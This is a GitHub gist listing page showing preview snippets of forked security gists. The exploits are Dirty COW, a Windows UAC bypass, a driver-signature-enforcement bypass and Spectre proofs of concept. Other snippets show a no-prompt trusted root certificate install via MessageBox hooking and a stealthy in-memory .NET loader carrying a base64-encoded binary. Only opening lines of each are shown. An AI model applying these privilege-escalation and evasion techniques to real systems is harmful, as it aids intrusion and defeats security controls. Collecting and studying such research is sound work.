Skip to content

Instantly share code, notes, and snippets.

View kernullist's full-sized avatar

꿀보 kernullist

39 followers · 34 following
View GitHub Profile
@kernullist
kernullist / naughtyc0w.c
Created October 27, 2016 00:52 — forked from mak/naughtyc0w.c
exploit for CVE-2016-5195 nothing fancy
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/uio.h>
#include <sys/wait.h>
@kernullist
kernullist / UACBypass.ps1
Created December 8, 2016 01:33 — forked from mattifestation/UACBypass.ps1
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@kernullist
kernullist / bin2elf.sh
Created February 20, 2017 01:20 — forked from tangrs/bin2elf.sh
Convert a memory dump/raw binary image into an ELF file
#!/bin/sh
# Convert a raw binary image into an ELF file suitable for loading into a disassembler
cat > raw$$.ld <<EOF
SECTIONS
{
EOF
echo " . = $3;" >> raw$$.ld
@kernullist
kernullist / main.c
Created July 21, 2017 01:55 — forked from hfiref0x/main.c
NtLoadEnclaveData Windows 10 RS3 DSE bypass
#include "global.h"
HINSTANCE g_hInstance;
HANDLE g_ConOut = NULL;
BOOL g_ConsoleOutput = FALSE;
WCHAR g_BE = 0xFEFF;
RTL_OSVERSIONINFOW g_osv;
#define CI_DLL "ci.dll"
@kernullist
kernullist / spectre.c
Created January 5, 2018 08:21 — forked from Badel2/spectre.c
Spectre attack example implementation
/* https://spectreattack.com/spectre.pdf */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@kernullist
kernullist / Spectre.md
Created January 8, 2018 04:51

Spectre still unfixed, unlike what Intel says

Written by https://twitter.com/never_released , reviewed and corrected by Alex Ionescu

On January 4th, 3 separate vulnerabilities were released, the two first ones being named Spectre (Variant 1 and 2) and the third one being Meltdown (Variant 3).

Intel CPUs are affected by all vulnerabilities, as are Apple A-series CPUs used on iOS devices, nVidia Tegra X2, the ARM Cortex-A75 and the Qualcomm Snapdragon 845 CPUs. CPUs with speculative execution from other manufacturers (other ARM "big" cores, AMD CPUs, PowerPC, ...) are affected by Spectre but not Meltdown.

In-order CPUs (such as ARM Cortex-A7 or ARM Cortex-A53, as are Atoms before 2013) are not affected by Meltdown and Spectre.

@kernullist
kernullist / spectre.c
Created January 8, 2018 04:54 — forked from ErikAugust/spectre.c
Spectre example code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@kernullist
kernullist / script.ps1
Created January 24, 2018 04:41
Hooking MessageBox For No-Prompt Trusted Root Certificate Install
#Verify Not Present
( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
#Import-Certificate
( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
#Prompted
Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99
@kernullist
kernullist / sync-projects
Created February 6, 2018 08:55 — forked from JonasGroeger/sync-projects
Gitlab: Clone / Pull all projects in a group
#!/usr/bin/env bash
# Documentation
# https://docs.gitlab.com/ce/api/projects.html#list-projects
NAMESPACE="YOUR_NAMESPACE"
BASE_PATH="https://gitlab.example.com/"
PROJECT_SEARCH_PARAM=""
PROJECT_SELECTION="select(.namespace.name == \"$NAMESPACE\")"
PROJECT_PROJECTION="{ "path": .path, "git": .ssh_url_to_repo }"
@kernullist
kernullist / LoadInMemoryModule.ps1
Created April 3, 2018 01:22 — forked from mattifestation/LoadInMemoryModule.ps1
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA